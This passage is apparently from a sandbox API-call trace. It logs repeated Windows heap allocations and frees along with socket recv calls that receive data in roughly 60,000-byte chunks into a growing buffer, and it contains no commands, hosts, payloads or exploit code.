0x900000 [0200.811] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0200.811] GetProcessHeap () returned 0x900000 [0200.811] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0200.811] GetProcessHeap () returned 0x900000 [0200.811] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0200.811] GetProcessHeap () returned 0x900000 [0200.811] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0200.811] GetProcessHeap () returned 0x900000 [0200.811] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0200.812] GetProcessHeap () returned 0x900000 [0200.812] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0200.812] GetProcessHeap () returned 0x900000 [0200.812] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x97fa58 [0200.812] GetProcessHeap () returned 0x900000 [0200.812] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.814] GetProcessHeap () returned 0x900000 [0200.814] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0200.814] GetProcessHeap () returned 0x900000 [0200.814] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0200.814] GetProcessHeap () returned 0x900000 [0200.815] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0200.815] GetProcessHeap () returned 0x900000 [0200.815] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0200.816] GetProcessHeap () returned 0x900000 [0200.816] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0200.816] GetProcessHeap () returned 0x900000 [0200.816] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x93af70 [0200.816] GetProcessHeap () returned 0x900000 [0200.816] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x9607b0 [0200.816] GetProcessHeap () returned 0x900000 [0200.816] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499e8 [0200.817] GetProcessHeap () returned 0x900000 [0200.817] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa58 [0200.817] GetProcessHeap () returned 0x900000 [0200.817] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499e8 | out: hHeap=0x900000) returned 1 [0200.818] GetProcessHeap () returned 0x900000 [0200.818] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499e8 [0200.819] GetProcessHeap () returned 0x900000 [0200.819] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0200.820] GetProcessHeap () returned 0x900000 [0200.820] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa58 [0200.820] GetProcessHeap () returned 0x900000 [0200.820] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9c8e78, Size=0x3a980) returned 0x98e4c0 [0200.821] GetProcessHeap () returned 0x900000 [0200.821] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0200.823] GetProcessHeap () returned 0x900000 [0200.823] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499e8 | out: hHeap=0x900000) returned 1 [0200.823] GetProcessHeap () returned 0x900000 [0200.823] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0200.824] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e7d8 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0200.824] GetProcessHeap () returned 0x900000 [0200.824] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0200.824] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 4691 [0200.824] recv (in: s=0x228, buf=0x34074f, len=55325, flags=0 | out: buf=0x34074f*) returned 55325 [0201.085] GetProcessHeap () returned 0x900000 [0201.085] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0201.085] GetProcessHeap () returned 0x900000 [0201.085] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.085] GetProcessHeap () returned 0x900000 [0201.085] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0201.086] GetProcessHeap () returned 0x900000 [0201.086] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0201.086] GetProcessHeap () returned 0x900000 [0201.086] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0201.086] GetProcessHeap () returned 0x900000 [0201.086] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0201.086] GetProcessHeap () returned 0x900000 [0201.086] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9c8e48 [0201.089] GetProcessHeap () returned 0x900000 [0201.089] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0201.089] GetProcessHeap () returned 0x900000 [0201.089] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.089] GetProcessHeap () returned 0x900000 [0201.089] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.089] GetProcessHeap () returned 0x900000 [0201.089] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9d78d0 [0201.089] GetProcessHeap () returned 0x900000 [0201.089] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.089] GetProcessHeap () returned 0x900000 [0201.089] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9c8e48 | out: hHeap=0x900000) returned 1 [0201.092] GetProcessHeap () returned 0x900000 [0201.092] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x9c8e48 [0201.092] GetProcessHeap () returned 0x900000 [0201.092] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x9607d0 [0201.093] GetProcessHeap () returned 0x900000 [0201.093] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9e6358 [0201.093] GetProcessHeap () returned 0x900000 [0201.093] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x970fd0 [0201.095] GetProcessHeap () returned 0x900000 [0201.095] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9e6358 | out: hHeap=0x900000) returned 1 [0201.095] GetProcessHeap () returned 0x900000 [0201.095] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa38 [0201.095] GetProcessHeap () returned 0x900000 [0201.095] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.095] GetProcessHeap () returned 0x900000 [0201.095] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x970fd0 [0201.095] GetProcessHeap () returned 0x900000 [0201.095] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x98e4c0, Size=0x493e0) returned 0x4260048 [0201.098] GetProcessHeap () returned 0x900000 [0201.098] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.100] GetProcessHeap () returned 0x900000 [0201.100] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa38 | out: hHeap=0x900000) returned 1 [0201.101] GetProcessHeap () returned 0x900000 [0201.101] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9d78d0 | out: hHeap=0x900000) returned 1 [0201.101] GetProcessHeap () returned 0x900000 [0201.101] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9c8e48 | out: hHeap=0x900000) returned 1 [0201.103] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e748 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7d8 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0201.104] GetProcessHeap () returned 0x900000 [0201.104] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0201.104] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 4601 [0201.104] recv (in: s=0x228, buf=0x3406f5, len=55415, flags=0 | out: buf=0x3406f5*) returned 55415 [0201.352] GetProcessHeap () returned 0x900000 [0201.352] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0201.352] GetProcessHeap () returned 0x900000 [0201.352] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.352] GetProcessHeap () returned 0x900000 [0201.352] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0201.353] GetProcessHeap () returned 0x900000 [0201.353] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0201.354] GetProcessHeap () returned 0x900000 [0201.354] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0201.354] GetProcessHeap () returned 0x900000 [0201.354] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0201.355] GetProcessHeap () returned 0x900000 [0201.355] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x97fa58 [0201.356] GetProcessHeap () returned 0x900000 [0201.356] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.358] GetProcessHeap () returned 0x900000 [0201.358] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.358] GetProcessHeap () returned 0x900000 [0201.358] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0201.358] GetProcessHeap () returned 0x900000 [0201.358] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0201.359] GetProcessHeap () returned 0x900000 [0201.359] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.359] GetProcessHeap () returned 0x900000 [0201.359] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0201.361] GetProcessHeap () returned 0x900000 [0201.361] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x97fa58 [0201.362] GetProcessHeap () returned 0x900000 [0201.362] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x9607f0 [0201.362] GetProcessHeap () returned 0x900000 [0201.362] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x93af70 [0201.363] GetProcessHeap () returned 0x900000 [0201.363] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499d8 [0201.363] GetProcessHeap () returned 0x900000 [0201.363] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.363] GetProcessHeap () returned 0x900000 [0201.363] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x93af70 [0201.363] GetProcessHeap () returned 0x900000 [0201.363] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499d8 | out: hHeap=0x900000) returned 1 [0201.363] GetProcessHeap () returned 0x900000 [0201.363] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499d8 [0201.363] GetProcessHeap () returned 0x900000 [0201.363] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4260048, Size=0x57e40) returned 0x98e4d0 [0201.366] GetProcessHeap () returned 0x900000 [0201.366] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499d8 | out: hHeap=0x900000) returned 1 [0201.368] GetProcessHeap () returned 0x900000 [0201.368] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.369] GetProcessHeap () returned 0x900000 [0201.369] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.370] GetProcessHeap () returned 0x900000 [0201.370] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0201.370] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0201.370] GetProcessHeap () returned 0x900000 [0201.370] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0201.370] GetProcessHeap () returned 0x900000 [0201.370] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0201.370] GetProcessHeap () returned 0x900000 [0201.370] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e7a8 [0201.371] GetProcessHeap () returned 0x900000 [0201.371] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0201.371] GetProcessHeap () returned 0x900000 [0201.371] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7d8 [0201.371] GetProcessHeap () returned 0x900000 [0201.371] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0201.371] GetProcessHeap () returned 0x900000 [0201.371] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0201.371] GetProcessHeap () returned 0x900000 [0201.371] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0201.371] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 4511 [0201.371] recv (in: s=0x228, buf=0x34069b, len=55505, flags=0 | out: buf=0x34069b*) returned 55505 [0201.618] GetProcessHeap () returned 0x900000 [0201.618] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0201.618] GetProcessHeap () returned 0x900000 [0201.618] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.618] GetProcessHeap () returned 0x900000 [0201.619] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0201.619] GetProcessHeap () returned 0x900000 [0201.619] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0201.620] GetProcessHeap () returned 0x900000 [0201.620] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0201.620] GetProcessHeap () returned 0x900000 [0201.620] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0201.621] GetProcessHeap () returned 0x900000 [0201.621] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x4260048 [0201.622] GetProcessHeap () returned 0x900000 [0201.622] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0201.622] GetProcessHeap () returned 0x900000 [0201.622] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.622] GetProcessHeap () returned 0x900000 [0201.622] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.622] GetProcessHeap () returned 0x900000 [0201.623] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4260048 | out: hHeap=0x900000) returned 1 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x9499f8 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960810 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x970fd0 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa38 [0201.623] GetProcessHeap () returned 0x900000 [0201.623] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.625] GetProcessHeap () returned 0x900000 [0201.625] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x970fd0 [0201.626] GetProcessHeap () returned 0x900000 [0201.626] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa38 | out: hHeap=0x900000) returned 1 [0201.626] GetProcessHeap () returned 0x900000 [0201.626] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa38 [0201.626] GetProcessHeap () returned 0x900000 [0201.626] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x98e4d0, Size=0x668a0) returned 0x4260048 [0201.629] GetProcessHeap () returned 0x900000 [0201.629] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa38 | out: hHeap=0x900000) returned 1 [0201.629] GetProcessHeap () returned 0x900000 [0201.630] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0201.630] GetProcessHeap () returned 0x900000 [0201.630] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.634] GetProcessHeap () returned 0x900000 [0201.634] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0201.635] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7d8 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e760 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0201.635] GetProcessHeap () returned 0x900000 [0201.635] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0201.635] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 4421 [0201.635] recv (in: s=0x228, buf=0x340641, len=55595, flags=0 | out: buf=0x340641*) returned 55595 [0201.881] GetProcessHeap () returned 0x900000 [0201.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0201.881] GetProcessHeap () returned 0x900000 [0201.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.881] GetProcessHeap () returned 0x900000 [0201.881] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0201.882] GetProcessHeap () returned 0x900000 [0201.882] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0201.882] GetProcessHeap () returned 0x900000 [0201.882] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0201.882] GetProcessHeap () returned 0x900000 [0201.882] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x42c68f0 [0201.884] GetProcessHeap () returned 0x900000 [0201.884] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x42d5378 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42c68f0 | out: hHeap=0x900000) returned 1 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x42c68f0 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42d5378 | out: hHeap=0x900000) returned 1 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x93af70 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960830 [0201.885] GetProcessHeap () returned 0x900000 [0201.885] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499e8 [0201.886] GetProcessHeap () returned 0x900000 [0201.886] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x42d5378 [0201.886] GetProcessHeap () returned 0x900000 [0201.886] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499e8 | out: hHeap=0x900000) returned 1 [0201.886] GetProcessHeap () returned 0x900000 [0201.886] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499e8 [0201.886] GetProcessHeap () returned 0x900000 [0201.886] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42d5378 | out: hHeap=0x900000) returned 1 [0201.886] GetProcessHeap () returned 0x900000 [0201.886] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x42d5378 [0201.886] GetProcessHeap () returned 0x900000 [0201.886] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4260048, Size=0x75300) returned 0x970fd0 [0201.890] GetProcessHeap () returned 0x900000 [0201.890] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42d5378 | out: hHeap=0x900000) returned 1 [0201.890] GetProcessHeap () returned 0x900000 [0201.890] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499e8 | out: hHeap=0x900000) returned 1 [0201.894] GetProcessHeap () returned 0x900000 [0201.894] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x42c68f0 | out: hHeap=0x900000) returned 1 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0201.899] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e7d8 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0201.899] GetProcessHeap () returned 0x900000 [0201.899] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0201.900] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 4162 [0201.900] recv (in: s=0x228, buf=0x34053e, len=55854, flags=0 | out: buf=0x34053e*) returned 55854 [0202.172] GetProcessHeap () returned 0x900000 [0202.172] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0202.172] GetProcessHeap () returned 0x900000 [0202.172] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 